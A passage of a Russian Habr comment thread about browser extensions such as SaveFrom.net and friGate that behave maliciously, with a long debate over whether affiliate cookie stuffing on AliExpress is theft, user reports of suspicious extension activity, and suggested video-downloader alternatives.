   Запрещают. И не они одни. Не будьте голословными. Это наверняка прописано в условиях сотрудничества с Алиэкспресс. В этом году, если ничего не путаю, один крупный кэшбэк сервис, которым я пользуюсь и вы наверняка его тоже знаете, изменил свой интерфейс расширения именно по причине запрета трафика из расширений со стороны Алиэкспресс. Такое было объяснение и я им верю, что они не сами это придумали.

5. хотя такая возможность есть, значит их устраивает

   Такая возможность есть. И они ее запретили использовать видимо не просто так.

6. Кто получит вознаграждение — блогер или автор расширения Али в общем-то плевать.

   Нет, не плевать. Это репутация партнерской программы, раз. Два — если ничего не делать, то в партнерке останутся одни мошенники с неразрешенными видами трафика и с этим магазином постепенно перестанут работать нормальные фирмы. И три, это самое главное тут (вы опять не в ту сторону рассуждаете). Самое важно тут, если расширение перехватывает чьи-то партнерские куки, то это означает, что оно забрало партнерские отчисления у того, кому они положены по правилам рекламодателя. Это может быть блогер на Youtube, купонный или скидочный сайт, сайт-обзорник или что угодно другое. Это их заслуга, что они привели покупателя на Алиэкспресс и они должны за это получить вознаграждение. Но если их куки перехвачены расширением, то это финансовое мошенничество со всеми вытекающими.

7. Можно с таким же успехом сказать, что кэшбек сервисы воруют отчисления у блогеров.

   Нет, тут не так. У вас видимо есть какие-то проблемы с пониманием причин и взаимосвязей. Если блогер делает обзор на Youtube, к примеру, и размещает под роликом ссылку, по которой переходит покупатель на сайт Али, то партнерские отчисления должен получить блогер. Но есть и другие сервисы для покупателя. Например, кэшбэк-сервисы, которые вы упомянули. Они тоже имеют полное право на существование, потому что не запрещены по своей сути Алиэкспресс и другими рекламодателями. Если покупатель с Youtube имеет установленный плагин для своего браузера от кэшбэк сервиса, то он вправе им воспользоваться в установленном порядке. Сейчас — это означает осознанный переход (клик) на сайт Алиэкспресс с сайта (но не из расширения!) кэшбэк сервиса. Если он его сделал до перехода по партнерской ссылке Youtube ролика, то партнерские отличесления уйдут Youtube блоггеру. Если после — авторам кэшбэк сервиса. В любом случае, покупатель делает сознательные! клики по одной или второй партнерской ссылке.
8. А монетизация, про которую написали Вы, как про безобидную — это откровенное воровство денег или у Алиэкспресс или у других партнеров типа блогера на Youtube или даже у кэшбэк сервиса. Я сам на этом попался когда-то. За это дают реальные сроки. Вы просили пример? Задайте запрос в поисковике «куки стаффинг тюрьма» или подобный. Ссылки прямые давать не буду, там много статей в том числе и история на Античате.

На Хабре есть директор Алиэкспресс.ру и представители других крупных магазинов. Спросите их мнение, если мне не верите. Если они ответят что-то иное, я очень удивлюсь. Почему? Потому что я сам имею отношение к не маленькому магазину с партнерской программой и поэтому я знаю о чем говорю.

[Vilgelm]

Вы прикидываетесь или занимаетесь сами перехватом партнерских кук и такими речами пытаетесь приуменьшить значимость проблемы?

Я никогда не занимался монетизацией расширений или их написанием для публичного доступа. Но я сталкивался с подобной монетизацией как пользователь, после чего взял привычку делать все покупки с кешбеком с чистого профиля.

Если сознательного перехода на сайт Алиэкспресс не было, если покупатель зашел сам на сайта Алиэкспресс, то и платить Алиэкспресс никому ничего не должен

За исключением когда человек использует кешбек сервис. Это точно такая же ситуация: клиента никто не приводил, он пришел сам, но партнерское вознаграждение все равно было выплачено (а сервис поделился частью с покупателем). Кешбек Алиэкспресс не запрещает. Тут по сути тоже самое, только с покупателем никто не поделился. Так или иначе, это уже заложено в цене (если продавец не участвует в партнерской программе, то и вознаграждения не будет, т.е. решение принимает продавец и это обязательно будет отражено в цене).

Запрещают. И не они одни.

Совсем ведь не сложно зайти на Admitad и посмотреть условия программы:

Обратите внимание на пункт 4

С 03.09.2020 в партнерской программе AliExpress RU&CIS разрешены следующие виды трафика для России и стран СНГ (кроме Украины):

1. Арбитраж трафика. C 15.12.2020 по 31.05.2021 включительно разрешены следующие виды покупного трафика:

Для России: facebook, myTarget, twitter, DV360 на веб. Яндекс и Google (веб и апп) — только РСЯ и Google Display Network (кроме Universal App Campaigns).
Для Белоруссии, Казахстана, Узбекистана: facebook, myTarget, twitter, DV360 на веб. Яндекс и Google (веб и апп) — только РСЯ и Google Display Network (кроме Universal App Campaigns).
Для остальных стран СНГ разрешены все виды арбитража трафика, кроме контекстной рекламы на бренд.
Контекстная реклама на бренд запрещена для трафика из всех стран. Также в оффере по-прежнему запрещена PV реклама (попапы, попандеры, бодиклик/кликандер) с непосредственным направлением трафика на партнерскую ссылку. При желании, вебмастера могут закупать PV-трафик на собственные промежуточные лендинги-витрины.

2. Купонные сайты, сайты-агрегаторы скидок и промокодов.

3. Партнерские сети, инструменты CPA-монетизации сайтов, платформы лидогенерации.

4. Браузерные расширения.

Поэтому Aliexpress это очевидно устраивает.

Такая возможность есть. И они ее запретили использовать видимо не просто так.

Такая возможность есть и они ее не запрещали.

в партнерке останутся одни мошенники с неразрешенными видами трафика

Но они разрешены как видите. Если бы были не разрешены, то такого партнера быстро бы заблокировали и на этом все бы закончилось.

Самое важно тут, если расширение перехватывает чьи-то партнерские куки, то это означает, что оно забрало партнерские отчисления у того, кому они положены по правилам рекламодателя

Как видите они не запрещают трафик с расширений, значит тут такая же история как с кебшеком, который также забирает деньги у партнеров.

В любом случае, я говорю только с точки зрения пользователя. И для пользователя это как правило безобидная вещь в отличие от того что описано в посте или поднятия прокси, как в Hola.

[habrohabrouser]

За исключением когда человек использует кешбек сервис. Это точно такая же ситуация: клиента никто не приводил, он пришел сам, но партнерское вознаграждение все равно было выплачено (а сервис поделился частью с покупателем)

Вы уж простите меня, что я повторяю, но вы совсем не понимаете что говорите. Вы повторяете свое видение ситуации, но оно ошибочно, хотя бы потому что вы учитываете только интересы покупателя. А есть еще интересы Алиэкспресс и других партнеров. Почему вы их не учитываете? Что бы использовать кэшбэк сервис вы должны его активировать. Само оно не выплатится вам. Это означает вам надо перейти по партнерской ссылке кэшбэк сервиса. И никак иначе. Нужен сознательный ваш клик. Без клика Алиэкспресс не выплатит комиссию за товар вашему кэшбэк сервисы, а они не выплатят вам.

Тут по сути тоже самое, только с покупателем никто не поделился. Так или иначе, это уже заложено в цене (если продавец не участвует в партнерской программе, то и вознаграждения не будет, т.е. решение принимает продавец и это обязательно будет отражено в цене).

Не то же самое. И почему вы опять оцениваете все с точки зрения только покупателя? Интересов магазина и других партнеров не существует или они тут не важны? Если нет сознательного клика, то и оплаты быть не должно. Еще раз. Все партнерки платят только и только за сознательные клики. Зачем им платить за человека, который уже сам к ним приходит без клика по ссылке партнера? На Алиэкспресс куки живут сутки (или трое), если не ошибаюсь, после клика по ссылке, именно для того, что бы партнеру не платить за последующие покупки, потому что покупатель уже приведен, нет необходимости платить за него еще раз. А вы, предлагая подобную монетизацию любого расширения, хотите что бы Алиэкспресс платил расширению, которое само вообще не приводило никого на Алиэкспресс. Улавливаете разницу для Алиэкспресс и других партнеров? Не видите тут кражи денег у них? В цене партнерские отчисления заложены, вы правы, но они выплачиваются только тем, кто их заслужил, то есть привел покупателя на сайт Алиэкспресс через сознательный клик. Все другие не имеют никакого права получать эти партнерские отчисления. Если расширение пытается таким способом монетизироваться, то есть самовольно без ведома покупателя подменяет ему куки, то это называется куки стаффингом. Найдите в Википедии и почитайте что это такое.

Вы привели условия программы Admitad. Это условия с 3 сентября. Я читал их пояснение к их расширению в каталоге Google раньше в этом году. Видимо правила поменялись. Но вы должны понимать, что речь идет о расширениях, у которых есть ссылки на Алиэкспресс в своем интерфейсе, а не, как вы написали в своем первом комментарии, делают перехват партнерских кук. Именно пеперехват — это куки стаффинг, это не сознательный клик. Если есть сознательный клик и если Адмитад разрешили трафик из расширений, то ради бога. Но вы завели разговор про перехват. А это уже воровство. Не у покупателей, а у Алиэкспресс и у других партнеров. Поставьте себя на место другого партнера. Вы сделали обзор чего-нибудь на Youtube. Человека вы заинтересовали, он перешел по вашей ссылке на Али, но ваша кука была перехвачена каким-нибудь расширением-прокси. Это расширение ничего не сделало для получения комиссии, но получило ее за вас. Какой смысл Али платить им, а не вам? Именно вы продвигаете Али посредством обзоров. А расширение-перехватчик ничего не сделало, но просто забрало ваши деньги. Как вы к этому отнесетесь?

Как видите они не запрещают трафик с расширений, значит тут такая же история как с кебшеком, который также забирает деньги у партнеров.

Надеюсь, у меня получилось объяснить и сейчас вы понимаете разницу.

В любом случае, я говорю только с точки зрения пользователя. И для пользователя это как правило безобидная вещь

Почему в ситуации, где есть 3 стороны, вы считаете уместным рассуждать только с точки зрения одной стороны и на основании только этого делать вывод о безобидности для всех сторон? Почему вы не берете в расчет сторону Алиэкспресс и других продавцов? Поставьте себя на их место и подумайте со всех сторон.

[Vilgelm]

хотя бы потому что вы учитываете только интересы покупателя

Я уже не раз писал что я говорю с точки зрения покупателя.

Что бы использовать кэшбэк сервис вы должны его активировать. Само оно не выплатится вам.

Это не всегда так. Можно поставить расширение кешбек сервиса, которое будет активировать кешбек при заходе на сайт. Принцип тот же самый.

Зачем им платить за человека, который уже сам к ним приходит без клика по ссылке партнера?

Кешбек это тоже оплата за человека, который сам приходит. От того, что пользователь нажал ссылку в кешбек сервисе он не становится новым клиентом. С точки зрения Алиэкспресса это такая же выплата за старого клиента. Не вижу в чем тут разница.

Вы привели условия программы Admitad

Я привел условия программы Aliexpress, которая расположена на Admitad. Условия заданы Aliexpress, а не Admitad.

Вы сделали обзор чего-нибудь на Youtube. Человека вы заинтересовали, он перешел по вашей ссылке на Али, но ваша кука была перехвачена каким-нибудь расширением-прокси.

Для блоггера это ничем не отличается от ситуации «перешел по ссылке на Али и воспользовался кешбек сервисом». Для Али это отличается только тем, что у людей будет меньше желания работать с их партнерской программой. Но если бы их это не устраивало, они бы запретили трафик с расширений, это ведь логично.

Есть такое расширение — Alitools, которое монетизируется подобным образом. Они предоставляют сервис мониторинга цен и другие подобные утилиты. У меня как у пользователя к ним претензий нет. В отличии от какой-нибудь Hola, которая поднимает локальный прокси и продает доступ неизвестно кому — это банально опасно. Вот и все что я пытаюсь донести, что для пользователя такой вид монетизации более безобиден. А не для других партнеров.

[habrohabrouser]

Знаете, очень сложно пытаться объяснить что-то человеку, который не хочет понять. Я спрошу у вас еще раз. Почему вы говорите только с точки зрения покупателя, когда подмена куки для покупателя не вредна? Вот зачем вы все время на это давите? Я вам сразу сказал, что ваша точка зрения не полная и объяснил почему. Есть еще сам Али и есть другие участники партнерской программы. А вы все равно настаиваете на невинности такой монетизации, потому что для покупателя это не страшно. Я ваше мнение уловил изначально, но стал объяснять шире и полностью, что бы вы поняли в чем может быть воровство.

Можно поставить расширение кешбек сервиса, которое будет активировать кешбек при заходе на сайт.

Покажите кто так делает. Если они это делают без клика покупателя — это куки стаффинг. Теоретически, кэшбэк сервисы — это единственный вид сервиса, которому такое может быть разрешено делать автоматически. Но для этого нужно обычно отдельное разрешение для такого вида сервисов.

Кешбек это тоже оплата за человека, который сам приходит. От того, что пользователь нажал ссылку в кешбек сервисе он не становится новым клиентом. С точки зрения Алиэкспресса это такая же выплата за старого клиента. Не вижу в чем тут разница.

Кэшбэк — это оплата за человека, который сам приходит на Алиэкспресс, но обязательно сам изъявляет желание получить кэшбэк посредством клика на соответствующую ссылку в кэшбэк сервисе. Нет клика — не будет и кэшбэка. Разницу улавливаете? Тут нет разговора про новый это клиент это или старый. Тут есть разговор про кликнул или нет. Если кликнул, Алиэкспресс будет платить за старого или нового, не важно. Но что бы не платить всегда потом, есть срок действия кук.

Для блоггера это ничем не отличается от ситуации «перешел по ссылке на Али и воспользовался кешбек сервисом»

Я продолжну вашу мысль. «перешел по ссылке на Али и воспользовался кешбек сервисом обязательно кликнув на ссылку кэшбэк сервиса». А если какое-то расширение делает подмену кук без вашего клика, то это совершенно другая ситуация. В этом случае вы не изъявляете желание и куки меняются без вашего желания. Это и называется куки стаффингом. Плохое расширение в таком случае просто пользуется вашей безграмотностью. Вам на это все равно, вы всегда тут были правы, но не все равно Али и блогерам, которые работают с Али. Неужели так сложно уловить разницу?

Для Али это отличается только тем, что у людей будет меньше желания работать с их партнерской программой. Но если бы их это не устраивало, они бы запретили трафик с расширений, это ведь логично.

Нормально так вы сделали важность целой партнерской программы неважной. Это чуть ли не самый важный элемент в их продвижении. С ними работают десятки тысяч, если не сотни людей по партнерской программе.
Когда вы говорите «они бы запретили трафик с расширений», то уточняйте какой трафик. Тот трафик, когда пользователь изъявил желание и кликнул сам по ссылке или тот трафик, о котором вы изначально написали — подмена кук. Второй тип трафика нигде и никогда не будет разрешен. Поймите вы это уже наконец. Мне лень регистрироваться в их партнерской программе, но я готов вам отправиить 1000 долларов, если там нет запрета на куки стаффинг (подмену кук).
Alitools никогда не устанавливал, поэтому точно не скажу. Но если они делают именно подмену кук без вашего клика, то они мошенники. Напишите Алиэкспресс, опишите ситуацию и спросите сами. Если сложно с английским, то попросите оценить ситуацию директора Алиэкспресс тут на Хабре. Он может передать этот вопрос сотрудникам на оценку. Если у них есть в интерфейсе ссылка на Али, если Али разрешает трафик по ссылкам из расширения, если Alitools не подменяет куки какими-то способами, то никаких проблем — это не подмена кук.

То, что вы пытались сказать, я понял сразу. И именно поэтому стал объяснять вам, что ваша точка зрения не полная, а потому не может называться верной.

[Vilgelm]

Почему вы говорите только с точки зрения покупателя, когда подмена куки для покупателя не вредна?

Вы может быть не понимаете о чем я говорю. Я лишь говорю о том, что пользователь не пользующийся кешбеком может безбоязненно поставить расширение, монетизируемое подобным образом, в отличие от обсуждаемого в статье или чего-то типа Hola. То есть пользователю с таким видом монетизации бороться не обязательно (если только оно у него кешбек не перехватывает).

Для Али оно может быть вредно и у них есть способы борьбы с этим, которые они почему-то не используют (а именно запрет трафика с расширений (любого, опции «запретить кукистаффинг» я у affiliate платформ не видел, но очевидно что запрет всего трафика с расширений запретит и это), у кучи других партнерских программ такой трафик запрещен). Почему я не знаю, но логично предположить что оно не так им и мешает или выгода от такого трафика перевешивает недостатки. С точки зрения денежных затрат это ничем не отличается от кешбека — такая же оплата за старого пользователя.

Нормально так вы сделали важность целой партнерской программы неважной.

Я не делал важность партнерской программы неважной. Я не знаю какими целями руководствуется Aliexpress принимая трафик с расширений. Если у вас есть возможность можете сами у них спросить. Я бы вообще старался не тратить деньги на старых пользователей через партнерскую программу — лояльность можно удерживать другими способами, например купонами, баллами, которые потом можно потратить на оплату заказа (тот же кешбек) и так далее. Но я не работаю в Ali.

Но если они делают именно подмену кук без вашего клика, то они мошенники.

Я не знаю как обстоят дела на данный момент, но кешбек сервисы обычно вносят его в свой стоп лист по причине перехвата кешбека, а в интернете можно найти примерно такую информацию:

Каждый раз, когда вы покупаете товар на Aliexpress, данное расширение модифицирует ссылку для получения кэшбека самим разработчиком.

Лично я это не проверял, может быть это поклеп со стороны конкурентов. Как я и говорил, покупаю я с кешбеком из чистого профиля без расширений, а цены через это расширение проверяю в другом профиле, поэтому на личный опыт сослаться не могу.

вот вам две статьи с расследованиями

По вашим ссылкам расширения маскировались под другие используя их торговые наименования, это куда более очевидный залет и причина для удаления. Но вообще вопрос законности я тут не поднимаю, это сложная тема. Возможно если где-нибудь в пользовательском соглашении будет написано, что установка расширения означает согласие пользователя на отдачу партнерских отчислений автору расширения, то это будет законно. А может и нет, я не знаю и речь изначально вел не об этом.

[habrohabrouser]

но очевидно что запрет всего трафика с расширений запретит и это

Запретить можно, но на примере статьи вы видите, что запретить — это одно, а трафик отправлять все равно будут пробовать.

С точки зрения денежных затрат это ничем не отличается от кешбека — такая же оплата за старого пользователя.

По условиям партнерских программ не за каждого старого пользователя нужно платить.

Я бы вообще старался не тратить деньги на старых пользователей через партнерскую программу — лояльность можно удерживать другими способами, например купонами, баллами, которые потом можно потратить на оплату заказа (тот же кешбек) и так далее.

Тут дело не в лояльности покупателей, а в том, что если не платить блогерам и другим в том числе и за старых покупателей, то все эти люди будут рекламировать другие площадки.

Лично я это не проверял, может быть это поклеп со стороны конкурентов

Сомневаюсь, что Мегабонус будут делать поклеп. Просмотрел отзывы у расширения Alitools. Похоже проблема действительно есть. Отзывы о краже кэшбэка периодически-постоянно появляются. По сути это воровство денег у доверчивых пользователей. Приведенные ваши две ссылки не единственные, где говорят о подмене кук с их стороны.

Но вообще вопрос законности я тут не поднимаю, это сложная тема.

Это не сложная тема. Тут все просто и понятно. Представьте, что вы блогер или владелец партнерки и все станет просто.

Возможно если где-нибудь в пользовательском соглашении будет написано, что установка расширения означает согласие пользователя на отдачу партнерских отчислений автору расширения, то это будет законно.

Нет, это не станет законным. Более того, это будет самопризнанием мошенничества. Правила расширения не могут быть важнее правил партнерской программы, от которой они получают деньги, и закона.

[habrohabrouser]

Если вам нужны еще доказательства, что расширения, которые делают подмену кук, нелегитимны, то вот вам две статьи с расследованиями, в результате которых расширения были удалены из каталога Google.
www.zdnet.com/article/google-removes-two-chrome-ad-blocker-extensions-caught-cookie-stuffing
www.express.co.uk/life-style/science-technology/1319293/Google-Chrome-warning-browser-issue-malicious-extensions

[vikarti]

А попросить оплатить не пробовали?
В Chrome Web Store платные расширения вполне себе бывают.
Ну и например за AdGuard VPN (в браузере у меня именно расширение от них — выборочно умеет заворачивать трафик от нужных сайтов на их VPN) я плачу, точнее за сам AdGuard VPN.

[dimskiy]

Я вас умоляю… народ ноет купить приложеньку в маркете за 100р :)

[shurricken]

я б сказал, что это разрабы каждую секунду ноют у тебя в браузере, почте и на сайтах заплати мне всего 10* рублей, ну что ты бедный что ли…
При том что почти никогда не понятно зачем тебе эта фигня и как долго она будет работать так же как на данный момент… но ноют беспрерывно

[zuek]

Я мог бы с Вами согласиться, если бы всегда пользовался безлимитны сверхскоростным интернетом с восьмиядерного ПК. Но моя реальность не всегда совпадает с таким положением дел — порой приходится сидеть с атома по каналу, раздаваемому со смартфона где-то вдали от крупных городов.

[andead]

У меня «friGate3 proxy helper» с месяц как начал жрать процессор при старте браузера. Я так и подумал, что встроили какую-то отправку статистики за предыдущий день. Сейчас вынес его в отдельный профиль от греха подальше.

[Envek]

После прочтения статьи первое впечатление от заголовка поменялось с «П — произвол» на «З — забота». Ваша статья — пример хорошей работы с сообществом. Вы молодцы, так держать!

[DarkFatal1ty]

Вставлю свои 5 копеек. Я использовал Frigate в Google Chrome ввиду наличия матери, которой нужно иногда заходить на сайт Одноклассники… При этом, у меня установлен Bitdefender Total Security, который в какой-то момент, стал блокировать «подозрительное подключение». Дело было еще в июне. Решил я раскопать, начал с отключения дополнений, и именно после Frigate пропали регулярные сообщения от антивируса с жалобой на 1 и тот же IP, больше всего прожил 188.165.30.217, но он пару раз менялся. Вернул назад Frigate, Bitdefender снова стал ругаться раз в пару часов. Я вооружился Wireshark, и выследил пакет с точной такими же данными как и Вас в статье. Так что, случай действительно имеет место быть, и продолжается это уже долго. Но дополнение так и висит в магазинах.

[Ka3anTiP]

Такая активность Savefrom.net только на хроме или на огнелисе тоже есть?

[VDG]

Я его использовал на FF и один раз словил непонятно откуда заигравшую рекламу, причём расширение не устанавливал, просто была открыта вкладка.

[V1tol]

SaveFrom.net уже не первый раз всплывает habr.com/ru/company/globalsign/blog/460987 Я даже отзыв на мозилла аддонс оставил, на что мне ответили «мы ничего не собираем».

[engine9]

Учитывая сколько «темных паттернов» у них на сайте, засранном рекламой, то не удивительно.

[tempick]

Самое забавное, что некоторое время пользовался этим расширением. Увидев что оно совершенно бесплатное, но при этом круто помогает в скачивании видео с ютуба, я решил поискать ссылку на офф. сайте для доната. Когда не нашёл такой, отписал им на почту что хочу немного задонатить, чтобы они не голодали и развивали расширение. Но мне ответили, что донатов им не надо. Вот тут я насторожился и на всякий случай удалил расширение. Теперь я понял, в чём подвох

[Maksimann]

Я ведь тоже не нашел, куда донатить, но не выкупил, почему. И реклама воспроизводилась, и был период, когда проц подгружало безумно (но я тогда грешил на майнера, потому что кулер орал как сумасшедший). В общем, картинка сложилась.

[Dier_Sergio_Great]

Уважаемые разработчики Яндекс. Пожалуйста добавьте в раздел расширений браузера флажек к каждому расширению, которое является НЕ ЖЕЛАТЕЛЬНЫМ.
Чтобы те кто случайно включил его или установил уже потом, те кто НЕ знаком с информацией о том что расширение опасно. Добавьте маркера в скисок расширений к каждому такому расширению.!!!

[kukutz]

Спасибо, подумаем, как лучше сделать, да.

[batyrmastyr]

А способа запретить eval внутри расширений нет? Ну или у себя внутри всех любителей eval в «подозрительные» записывать.

[Dier_Sergio_Great]

Наверно нет. Все потому что каждые 2 из 3 будут иметь этот eval.
Расширения для браузера это не скрипт по анимации фоток слева направо. Расширения изначально рассчитаны на то что будут парсить страницу и искать то ли рекламу, то ли скрипты и то режим видимости вставлять в сообщения ВК.
В общем все расширения это каталог костылей которые подставляют под браузер. Модифицирующие браузер и сайты.

[Dier_Sergio_Great]

Еще просьба большая. К первой чтобы маркировать расширения в списке установленных прежде флашками о том что они подозрительные.
Добавьте пожалуйста сообщение в банер при попытке установить подозрительное расширение.
Я многократно пытался установить расширения из ChromeExtensions многократно было сообщение «Установить НЕ УДАЛОСЬ».
Не понятно Почему не удалось, куда не удалось, зачем не удалось?
Очень много расширений например таких как замораживатели вкладок, половина таких расширений не может установится.
Ни сообщения нет, ни причин почему не устанавливается.

[kukutz]

А можете примеры таких замораживателей дать, пожалуйста? Посмотрим. что с ними не так.

[Dier_Sergio_Great]

Это только некоторые из замораживающих вкладки, но мне очень много попадались выполняющих другие функции.
chrome.google.com/webstore/detail/taboptimizer/cgcmkbkicaeljmcbmblchikjmmlokfag
chrome.google.com/webstore/detail/freetabmemory/ehbifmnhnghckaobolojbabkagnhjajm
chrome.google.com/webstore/detail/tabmemoryoptimizer/mjillkibdjeflldljbgaemfpencpfgkg
chrome.google.com/webstore/detail/tabbooster/fajpbonghcpkhjiiebgdklnkndgjjcch

Я пару раз писал об этом в службу поддержки браузера, мне отвечали что мол это защита браузера.

[kukutz]

Набор из подобных (в том числе этих) расширений устанавливался через устрашающие лендинги — типа «нажми скорее чтобы ускорить», «у тебя все тормозит», «у тебя вирусы и все тормозит» и т.д. и затем примерно через месяц использования расширения начинали нехорошую деятельность. Это выражалось, например, в том, что на других сайтах они могли отрисовывать окно о том, что «у вас есть возврат ндс», клик на которое вел на сайт, который мог увести у вас деньги.

[Dier_Sergio_Great]

Извените, еще маленькая просьба, не в тему.
Не знаю кому написать, так как служба поддержки игнорирует.
Добавить режим отображения ссылок в панели избранного в виде только лишь иконок.
Очевидно что у каждого сайта иконки разные, одной иконки достаточно чтобы было ясно что за ссылка. При этом на панели поместится в 4 раза больше иконок.
На андроиде есть режим отображения иконок на рабочем столе без подписей. А ваш браузер режим показа панели избранного такого не умеет.

[kukutz]

А можно же просто вручную пустое имя поставить нужным закладкам?

[Dier_Sergio_Great]

На текущий момент я так и делаю.
Но при группировке или при открытии браузера в узком оконном режиме, ссылки открываются в виде выпадающего списка без названий. А самое главное по таким ссылкам производить поиск НЕ возможно!

[Dier_Sergio_Great]

У меня какое то расширение что то мутит.
Когда я перехожу по ссылке скачать Tox, Electrum, яндекс.Деньги с магазина play.google.com то с этих переходов почему то открывается страница одного и того же кошелька play.google.com/store/apps/details?id=ru.cupis.wallet
Какое то расширение подменяет ссылку.
Расширений много.
Все таки сделайте маркер «опасно!» в списке расширений напротив подозрительных расширений.
.
И! Еще есть такая проблема, в списке расширений браузера нет ссылки на страницу расширения в каталоге расширений.
Проходит время, забываю что расширение означает, а искать его по хешу в каталоге практически нет возможности. часто по одному названию не понятно что расширение означает.

[kukutz]

Если бы мы знали, какое расширение подозрительное, мы бы его забанили.

Насчет ссылки мысль хорошая, спасибо. Сейчас она есть в контекстном меню, которое возникает, если кликнуть по иконке расширения на тулбаре браузера.

[Dier_Sergio_Great]

Здравствуйте. Я очень хочу найти зловредные расширения путем исключения.
У меня раширенний более 200, только ~70 из них включены. Остальные как бы могут пригодится на будущее.
Зачем так много, там по пару расширений для каждой функции в результате много получилось, парочку для дебага Juqery, парочку для Ajax запросов, парочку для просмотра видео popup.
…
Чтобы найти зловредное расширение я решил воспользоватся
chrome.google.com/webstore/detail/extensions-switcher/mapmknaogodpakjopdhmdcilahbfbjpc
этим расширением.
Оно позволяет группировать расширения и отключать сразу группу расширений. Кстати это в будущем позволило держать не 70 расширений включенных а только 10.
Проблема в том что это расширение работает в других браузерах.
А в Вашем браузере постоянно выскакивает коно защиты на подтверждение, блокируя весь функционал.
Таким образом я не могу найти звловредное расширение, так как браузер блокирует расширение которое я установил.
.
Что мне делать посоветуете? Как мне найти зловредное расширение? Какой менеджер расширений мне порекомендуете чтобы я помог себе и вам обнаружить зловред?

[kukutz]

А что за окно защиты на подтверждение, о чём речь?

[Dier_Sergio_Great]

chrome.google.com/webstore/detail/extensions-switcher/mapmknaogodpakjopdhmdcilahbfbjpc
Например чтобы включить группу расширений, расширение «Extension switcher» всключает легко, но если надо отключить группу расширений, то появляется вот это окно на картинке, А функционально отключается только одно расширение из группы.

[namikiri]

Да уж, совсем какая-то жесть.

А печальнее всего что Сейвфром-то офигеть какой удобный! Есть ли ему альтернативы? После этой статьи рассматриваю вариант вручную вырезать из JS вредоносные части и устанавливать расширение локально. Но это очень ненадёжно…

[Solovej]

del

[JimDi]

youtube-dl
ytdl-org.github.io/youtube-dl/supportedsites.html — список поддерживаемых сайтов

[namikiri]

Про YT-DL знал, а вот про то, что он умеет столько всего качать — нет. Спасибо! А в виде расширения для браузера что-нибудь есть?

[JimDi]

как вариант Video DownloadHelper, выглядит немного топорно, но работает. кроме аддона ещё рекомендуется установить компоненты для того чтобы медиа сразу конвертировалось
addons.mozilla.org/en-US/firefox/addon/video-downloadhelper
chrome.google.com/webstore/detail/video-downloadhelper/lmjnegcaeklhafolokijcfjliaokphfk
addons.mozilla.org/en-US/firefox/addon/video-downloadhelper

[mk2]

Если бы он ещё не добавлял свой qr-код на сконвертированное видео. Мало того, что это не слишком приятно, так ещё и для этого требуется перекодировать видео вместо того, чтобы просто слить видео и аудиопотоки.

[JimDi]

может и просто сливать, только потом многие жалуются что формат медиа какой-то не тот

[mk2]

Если бы VDH перекодировал всё в h264, я бы ещё понял, потому что его достаточно быстро кодирует и его поддерживают практически все устройства. Но я вот сейчас скачал видео в av1 и VDH попытался его перекодировать в av1 же.

[vikarti]

Проблема решаема -:)
www.downloadhelper.net/convert
Всего за 28.50 USD / 18.50 EUR (через Stripe)

[tandzan]

У меня Video DownloadHelper через некоторое время работы начинает жрать ресурсы CPU, особенно на отрытом Youtube и пр. Оставил его на отдельном браузере только для скачки потокового видео.

[vladkorotnev]

Когда-то было плагинище для файрфокса, позволяющее добавить в контекстное меню произвольную консольную команду и передачу ей аргументом адреса текущей страницы. Название, увы, забыл, но, кажись — засунуть youtube-dl в PATH, создать такое меню, и это вот оно и будет.

[JimDi]

External Application Button — оно?
Homepage: add0n.com/external-application-button.html
Chrome Store: chrome.google.com/webstore/detail/external-application-butt/bifmfjgpgndemajpeeoiopbeilbaifdo
Firefox add-ons: addons.mozilla.org/en-US/firefox/addon/external-application
Opera addons: addons.opera.com/en/extensions/details/external-application-button

[vladkorotnev]

Вроде бы похоже, да

[engine9]

После youtube-dl это поделие даже вспоминать не хочется.

[x86corez]

SaveFrom не использую, но использую friGate Light, и уже давно заметил, что при включении начинает жрать процессор. В первый же день, когда заметил это, нашёл старую необновлённую версию плагина на другой машине, сохранил исходники, и до сих пор пользуюсь. Правда пришлось немного допилить напильником от интеграции с какой-то рекламной баннерной сетью.

До сегодняшнего дня думал, что они пытаются майнить в фоне. Было бы хорошо выложить на какой-нибудь GitHub вылеченную версию от этой проказы...

[slavarussko]

Я и дальше буду им пользоваться, благо для скачивая достаточно открыть их сайт и вставить в поле адрес с видео. Расширение можно не ставить. Хотя на портабельном хроме и в Опера оно не выкаблучивалось.

[Yorshick321]

Вот именно, зачем городить огород, если достаточно ссылку вставить и скачать без рисков?

[slavarussko]

Потому что им лень, в один клик привыкли…

[Noortvel]

github.com/Tyrrrz/YoutubeDownloader (по мне удобнее чем youtube-dl)

[Revertis]

Mozilla рекомендует «YouTube Video and Audio Downloader (Dev Edt.)», пользуюсь довольно давно, очень удобно. Даже аудио и видео дорожки вместе собирает.

[StjarnornasFred]

Проблема в том, что Savefrom очень популярен и вряд ли утратит популярность в будущем: по всему интернету уже расползлись инструкции вида «чтобы скачать видео с ютуба, подставьте буковки ss перед его названием в строке браузера». А сайт ssyoutube.com, естественно, принадлежит Savefrom.

Имхо, Яндекс должен исключить данный сайт из поисковой выдачи и предупреждать при попытках открыть его браузером, если с него раздаётся вредоносное расширение.

P. S.

Я просто фигею с некоторых хабровчан. Не могу комментировать чаще чем раз в 5 минут, из-за того что оставил коммент с мнением, отличающимся от общепринятого, и народ мигом забыл про этикет Хабра в части раздачи минусов. Минус — «не аргумент» и «тем более не контраргумент»? Да ладно?

[molnij]

ну я захожу на сайт нажимаю скачать без установки плагина и качаю… всегда было недоверие к их плагину\программе

[bilayan]

по всему интернету уже расползлись инструкции вида «чтобы скачать видео с ютуба, подставьте буковки ss перед его названием в строке браузера».

Этой инструкции уже лет 10 примерно.

[C_21]

Начал пропадать звук на ютубе в хроме еще летом. По первой ссылке в гугле было рекомендовано удалить SaveFrom.net. Удалил и проблема исчезла. Очень удобное расширение было. Жаль что произошла такая неприятность.

[Stesh]

неприятность

Неприятность — это когда мизинцем об стол ударился… А когда целенаправленно впиливают трояна в приложение — обычно это иначе называют.

[C_21]

обычно это иначе называют.

Я написал «неприятность», что бы не попасть под действие закона о мате.

[chelovek-jpeg]

хуже всего, что за столько лет так и не появилось юзабельных альтернатив, это странно

[algotrader2013]

Кстати, вопрос к разработчикам браузера. У вас нет возможности собирать статистику по работе расширений и давать пользователю отчёт?
Что-то из разряда "модифицировало код на таких-то страницах, ходит на такие-то урлы"?

[loginsin]

Про «модифицировало код» — утомишься от таких сообщений при установленном adblock и Co.

[DerRotBaron]

Если нормально это сделать, проблем возникать не должно. Но поскольку как минимум Гуглу и Яндексу адблоки невыгодны, нормально это сделано будет вряд ли

[SNNikitin]

